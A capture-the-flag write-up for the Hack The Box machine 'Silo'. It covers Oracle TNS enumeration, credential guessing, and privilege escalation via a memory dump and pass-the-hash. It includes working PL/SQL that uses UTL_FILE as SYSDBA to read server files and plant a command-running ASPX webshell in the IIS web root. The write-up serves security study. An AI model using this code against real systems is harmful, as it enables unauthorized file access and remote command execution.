Silo
Summary
I really like this machine because I had the opportunity to play with an Oracle TNS database for the first time and to learn and use some new tools that helped me along the way. To start off, I will use this database to upload a webshell to the web server, which will get me a PowerShell shell. For privilege escalation (privesc), and this is the first time I have found something like this in an HTB box, I will be playing with a memory dump file to get a hash that I can use with pass-the-hash to get a shell as Administrator. There is an unintended way to get the root flag before even getting a foothold; I will talk about it in Beyond Root.
Enumeration
As always, I begin with the enumeration of ports using nmap:
➜ nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v
Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
➜ nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2023-12-31T11:48:09
|_ start_date: 2023-12-31T11:18:37
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
I always like to go for the small attack surfaces first and clear them out, so that when I go for a wide one I can be more flexible, even with time. Web apps, for example, have a large attack surface compared to other services. So I will start with RPC:
I can't access RPC without credentials, so I will move on to SMB:
Same goes for the SMB server. I will keep in mind that if I get any credentials, I can retest these two services.
I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS 8.5 server. I will fuzz the web app to see if there is anything hidden.
I didn't find anything, so I will move on to the next web app on port 8080. This one asks for a login (HTTP Basic auth, realm XDB) immediately, before showing any page. I tried some default credentials, but they didn't work, so I'm leaving this web app aside until I find some creds; maybe then I can log in. Worth noting: Oracle XML DB authenticates against the database's own accounts, so any database credentials found later can be retried here as well.
Now I went for the Oracle TNS database. After reading about this type of database and exploring multiple attack paths, I found this HackTricks article useful: https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener
First I will enumerate the SID using a tool called odat.
XE is a valid SID.
Now I will try to find some valid credentials using odat's passwordguesser module.
Setting up sqlplus
Since I have valid credentials, I will try to connect to the database. I will use sqlplus for this, but first I need to set it up. Following 0xdf's steps, I will need to download:
instantclient-basic-linux.x64-12.2.0.1.0.zip
instantclient-sdk-linux.x64-12.2.0.1.0.zip
instantclient-sqlplus-linux.x64-12.2.0.1.0.zip
Unzip them into the same directory, then open your shell's rc file (in my case zsh) and add these lines:
Then you will be ready to go.
Shell as defaultapppool
Connecting "as sysdba" gave me SYSDBA privileges, which make it easy both to read through the database and to change the configuration of the database itself. I can see my user's permissions through:
I can see that I have SYS privileges on the database, so I will try to write an Oracle (PL/SQL) script that reads files.
I successfully wrote and ran the script, but I couldn't see its output, so I will turn on the serveroutput option (SET SERVEROUTPUT ON).
Then I rerun my script by just running "/".
And now I can read files. Next, I will try to write a file to the root directory of the web app.
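The following is an added example of the three steps above (check privileges, read a file, write a file), written for this page and not the author's own script. It uses UTL_FILE through DIRECTORY objects, which a SYSDBA session can create for any path. Assumptions: the sample file read is C:\Windows\win.ini, the IIS web root is C:\inetpub\wwwroot, the directory object names READ_DIR and WEB_DIR are arbitrary, and the written ASPX is a minimal command-runner shell of my own rather than the trimmed cmd.aspx from the post. One caveat a practitioner should keep in mind: UTL_FILE runs with the operating-system privileges of the Oracle service account, not of the database user, so what can be read or written depends on that account.

```sql
-- Run inside sqlplus connected "as sysdba". Without this, DBMS_OUTPUT is swallowed.
SET SERVEROUTPUT ON

-- 1. Who am I, and is this really a SYSDBA session?
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER') AS who,
       SYS_CONTEXT('USERENV', 'ISDBA')        AS is_dba
  FROM dual;
SELECT privilege FROM session_privs ORDER BY privilege;

-- 2. Read a file. UTL_FILE only opens files under a DIRECTORY object,
--    so point one at the folder holding the target (assumed sample path).
CREATE OR REPLACE DIRECTORY read_dir AS 'C:\Windows';
DECLARE
  f    UTL_FILE.FILE_TYPE;
  line VARCHAR2(32767);
BEGIN
  -- The directory name must be given exactly as stored: unquoted -> uppercase.
  f := UTL_FILE.FOPEN('READ_DIR', 'win.ini', 'R', 32767);
  LOOP
    BEGIN
      UTL_FILE.GET_LINE(f, line);
      DBMS_OUTPUT.PUT_LINE(line);
    EXCEPTION
      WHEN NO_DATA_FOUND THEN EXIT;   -- GET_LINE raises this at end of file
    END;
  END LOOP;
  UTL_FILE.FCLOSE(f);
END;
/

-- 3. Write a file into the web root (assumed path C:\inetpub\wwwroot).
--    q'[...]' quoting avoids escaping every quote inside the ASPX source.
CREATE OR REPLACE DIRECTORY web_dir AS 'C:\inetpub\wwwroot';
DECLARE
  f UTL_FILE.FILE_TYPE;
BEGIN
  f := UTL_FILE.FOPEN('WEB_DIR', 'givemeshell.aspx', 'W', 32767);
  UTL_FILE.PUT_LINE(f, q'[<%@ Page Language="C#" %>]');
  UTL_FILE.PUT_LINE(f, q'[<%@ Import Namespace="System.Diagnostics" %>]');
  UTL_FILE.PUT_LINE(f, q'[<script runat="server">]');
  UTL_FILE.PUT_LINE(f, q'[void Page_Load(object s, EventArgs e) {]');
  UTL_FILE.PUT_LINE(f, q'[  string c = Request["cmd"]; if (c == null) return;]');
  UTL_FILE.PUT_LINE(f, q'[  var psi = new ProcessStartInfo("cmd.exe", "/c " + c);]');
  UTL_FILE.PUT_LINE(f, q'[  psi.UseShellExecute = false; psi.RedirectStandardOutput = true;]');
  UTL_FILE.PUT_LINE(f, q'[  var p = Process.Start(psi);]');
  UTL_FILE.PUT_LINE(f, q'[  Response.Write("<pre>" + Server.HtmlEncode(p.StandardOutput.ReadToEnd()) + "</pre>");]');
  UTL_FILE.PUT_LINE(f, q'[}]');
  UTL_FILE.PUT_LINE(f, q'[</script>]');
  UTL_FILE.FCLOSE(f);
END;
/
```

Each PL/SQL block ends with a line containing only "/", which is also what re-executes the last block from the sqlplus buffer. No blank lines are placed inside a block, because by default sqlplus treats a blank line as the end of the input. Once step 3 has run, a request to http://10.10.10.82/givemeshell.aspx?cmd=whoami should return the IIS application pool identity. The read block in step 2 is the same pattern reused later in Beyond Root: re-point the directory object at the folder holding root.txt and change the file name.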
Going for the webshell. I will use the cmd.aspx webshell from /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx, but I will remove the styling lines and some unnecessary lines so that it looks like this:
By accessing http://10.10.10.82/givemeshell.aspx, I can run commands easily from the webshell. However, this shell isn't very flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.
From the webshell, I will run:
Privesc
Beside the user.txt file on Phineas's Desktop there is an "Oracle issue.txt" file.
I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.
After unzipping the file:
It's a memory dump file, so I will use Volatility to analyze it, but first I need a profile.
Now I will use impacket's psexec with the recovered hash (pass-the-hash) to get a shell as Administrator.
Beyond Root
Here I will show how I could simply read root.txt through the Oracle database, which is easy: I just need to reuse the Oracle script I wrote to read files and point it at the root.txt path. This works because the Oracle service account, under which UTL_FILE performs the file access, has enough privilege on the box to read the Administrator's files.
